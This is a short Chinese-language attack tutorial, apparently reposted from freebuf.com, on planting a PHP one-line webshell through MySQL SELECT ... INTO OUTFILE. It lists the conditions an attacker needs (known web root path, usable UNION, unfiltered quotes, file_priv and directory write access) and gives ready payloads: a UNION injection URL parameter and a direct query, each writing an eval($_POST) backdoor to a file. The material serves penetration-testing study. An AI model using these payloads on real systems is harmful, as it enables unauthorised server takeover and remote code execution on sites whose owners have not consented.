mysql into outfile注射一句话木马 – 作者:Johnson666

条件

关于mysql into outfile注射，要使用into outfile 把代码写到web目录取得webshell首先需要3大先天条件：

1、知道物理路径（into outfule ‘物理路径’), 这样才能写对目录。

2、能够使用union 。（需要mysql 3以上的版本）这个条件是在url里才需要，如果直接登录进别人的数据库，那么就不需要能够使用union了

例子：
?id=1 union select '<?php @eval($_POST['c']);?>' into outfile "C:/phpStudy/WWW/a.php"

3、对方没有对’和”进行过滤,因为outfile后面的物理路径必须要有引号

后天条件需要二个：

1、就是mysql用户拥有file_priv权限（不然就不能写文件或读文件）

2、对web目录有写权限MS的系统就不说了，一般都会有权限的，但是linux的系统，通常都是rwxr-xr-x，也就是说组跟其他用户都没有权限写操作，所以，要满足这5大条件还是蛮高难度的。

MySQL 导出数据select into outfile一句话木马用法

例子：直接登录进别人的数据库的时候：

SELECT "<?php @eval($_POST['xiaohua']); ?>"
INTO OUTFILE '/tmp/test1.php'

url里就要用union了

例子：
?id=1 union select '<?php @eval($_POST['c']);?>' into outfile "C:/phpStudy/WWW/a.php"

来源：freebuf.com 2021-02-27 15:44:32 by: Johnson666